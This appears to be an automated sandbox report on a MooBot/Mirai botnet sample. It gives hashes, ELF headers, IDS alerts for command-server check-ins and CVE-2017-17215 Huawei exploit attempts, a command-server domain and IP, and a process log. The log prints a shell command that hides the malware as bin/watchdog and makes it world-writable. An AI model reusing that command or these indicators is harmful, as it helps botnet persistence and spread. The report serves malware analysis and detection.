                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                File name:XHZFo8hExw.elf
                File size:58448
                MD5:f90025024613f3a9d54373f3cc68eefd
                SHA1:b44c167b326ff981979a38c1086cebe9d27feb66
                SHA256:d502542baec72142eef5bbe366c81681acaca46c920c37c724d2cd0b8a93a223
                SHA512:84c3505f1361c7907bd3533254ab0a8054365e7e7313205e97b7ae9ff5e209fd217dfb02e0876c91ed7de9beb116c89c4121eb5ee1fc3301459a38a13e6028e5
                SSDEEP:1536:ka4CVvtTO8yJT/0fSGUPk+nU61TH6V/Ps06r6M3:d4CxtTO8yd/0KGUs+n31Ta9k0JA
                TLSH:43434BC4F647E8F5DC5706741036EB778B32F5FA2218D743D3A99A32AC92601E617A8C

                ELF header

                Class:
                Data:
                Version:
                Machine:
                Version Number:
                Type:
                OS/ABI:
                ABI Version:
                Entry Point Address:
                Flags:
                ELF Header Size:
                Program Header Offset:
                Program Header Size:
                Number of Program Headers:
                Section Header Offset:
                Section Header Size:
                Number of Section Headers:
                Header String Table Index:
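                Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
                 | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 |  | 0 | 0 | 0
                .init | PROGBITS | 0x8048094 | 0x94 | 0x1c | 0x0 | 0x6 | AX | 0 | 0 | 1
                .text | PROGBITS | 0x80480b0 | 0xb0 | 0xbc96 | 0x0 | 0x6 | AX | 0 | 0 | 16
                .fini | PROGBITS | 0x8053d46 | 0xbd46 | 0x17 | 0x0 | 0x6 | AX | 0 | 0 | 1
                .rodata | PROGBITS | 0x8053d60 | 0xbd60 | 0x1ffc | 0x0 | 0x2 | A | 0 | 0 | 32
                .ctors | PROGBITS | 0x8056000 | 0xe000 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
                .dtors | PROGBITS | 0x8056008 | 0xe008 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
                .data | PROGBITS | 0x8056020 | 0xe020 | 0x260 | 0x0 | 0x3 | WA | 0 | 0 | 32
                .bss | NOBITS | 0x8056280 | 0xe280 | 0x25c8 | 0x0 | 0x3 | WA | 0 | 0 | 32
                .shstrtab | STRTAB | 0x0 | 0xe280 | 0x3e | 0x0 | 0x0 |  | 0 | 0 | 1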
                Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
                LOAD | 0x0 | 0x8048000 | 0x8048000 | 0xdd5c | 0xdd5c | 6.5895 | 0x5 | R E | 0x1000 |  | .init .text .fini .rodata
                LOAD | 0xe000 | 0x8056000 | 0x8056000 | 0x280 | 0x2848 | 3.4568 | 0x6 | RW | 0x1000 |  | .ctors .dtors .data .bss
                GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x4 |  | 
                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                03/20/23-16:35:53.346108 | TCP | 2030490 | ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) | 51628 | 56999 | 192.168.2.23 | 103.161.181.97
                03/20/23-16:36:47.049175 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 56256 | 37215 | 192.168.2.23 | 156.224.11.114
                03/20/23-16:36:24.420831 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 40986 | 37215 | 192.168.2.23 | 41.237.5.201
                03/20/23-16:36:24.331963 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 39570 | 37215 | 192.168.2.23 | 157.122.72.69
                03/20/23-16:37:00.531602 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 39590 | 37215 | 192.168.2.23 | 41.36.233.70
                03/20/23-16:37:21.136876 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 32976 | 37215 | 192.168.2.23 | 147.46.79.137
                03/20/23-16:37:52.298836 | TCP | 2030489 | ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response | 56999 | 51628 | 103.161.181.97 | 192.168.2.23
                03/20/23-16:36:06.532616 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 39574 | 37215 | 192.168.2.23 | 197.39.68.98
                03/20/23-16:36:24.422131 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 40988 | 37215 | 192.168.2.23 | 41.237.5.201
                03/20/23-16:36:58.418193 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 59410 | 37215 | 192.168.2.23 | 154.38.241.212
                03/20/23-16:37:32.803566 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 57594 | 37215 | 192.168.2.23 | 197.39.56.45
                03/20/23-16:36:00.398384 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 46574 | 37215 | 192.168.2.23 | 27.0.158.180
                03/20/23-16:36:12.950349 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 44976 | 37215 | 192.168.2.23 | 41.239.113.31
                03/20/23-16:37:53.743391 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 39134 | 37215 | 192.168.2.23 | 163.15.165.22
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Mar 20, 2023 16:35:53.149841070 CET | 192.168.2.23 | 8.8.8.8 | 0xb6e9 | Standard query (0) | kamuiv3.hopto.org | A (IP address) | IN (0x0001) | false

                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Mar 20, 2023 16:35:53.170298100 CET | 8.8.8.8 | 192.168.2.23 | 0xb6e9 | No error (0) | kamuiv3.hopto.org |  | 103.161.181.97 | A (IP address) | IN (0x0001) | false

                System Behavior

                Start time:16:35:52
                Start date:20/03/2023
                Path:/tmp/XHZFo8hExw.elf
                Arguments:/tmp/XHZFo8hExw.elf
                File size:58448 bytes
                MD5 hash:f90025024613f3a9d54373f3cc68eefd

                Start time:16:35:52
                Start date:20/03/2023
                Path:/tmp/XHZFo8hExw.elf
                Arguments:n/a
                File size:58448 bytes
                MD5 hash:f90025024613f3a9d54373f3cc68eefd

                Start time:16:35:52
                Start date:20/03/2023
                Path:/bin/sh
                Arguments:sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv */tmp/XHZFo8hExw.elf <\\xc0\\xbc\\xff\\x84\\x83\\x86\tbin/watchdog; chmod 777 bin/watchdog"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time:16:35:52
                Start date:20/03/2023
                Path:/bin/sh
                Arguments:n/a
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time:16:35:52
                Start date:20/03/2023
                Path:/usr/bin/rm
                Arguments:rm -rf bin/watchdog
                File size:72056 bytes
                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                Start time:16:35:52
                Start date:20/03/2023
                Path:/bin/sh
                Arguments:n/a
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time:16:35:52
                Start date:20/03/2023
                Path:/usr/bin/mkdir
                Arguments:mkdir bin
                File size:88408 bytes
                MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                Start time:16:35:52
                Start date:20/03/2023
                Path:/bin/sh
                Arguments:n/a
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time:16:35:52
                Start date:20/03/2023
                Path:/usr/bin/chmod
                Arguments:chmod 777 bin/watchdog
                File size:63864 bytes
                MD5 hash:739483b900c045ae1374d6f53a86a279

                Start time:16:35:52
                Start date:20/03/2023
                Path:/tmp/XHZFo8hExw.elf
                Arguments:n/a
                File size:58448 bytes
                MD5 hash:f90025024613f3a9d54373f3cc68eefd

                Start time:16:35:52
                Start date:20/03/2023
                Path:/tmp/XHZFo8hExw.elf
                Arguments:n/a
                File size:58448 bytes
                MD5 hash:f90025024613f3a9d54373f3cc68eefd

                Start time:16:35:52
                Start date:20/03/2023
                Path:/tmp/XHZFo8hExw.elf
                Arguments:n/a
                File size:58448 bytes
                MD5 hash:f90025024613f3a9d54373f3cc68eefd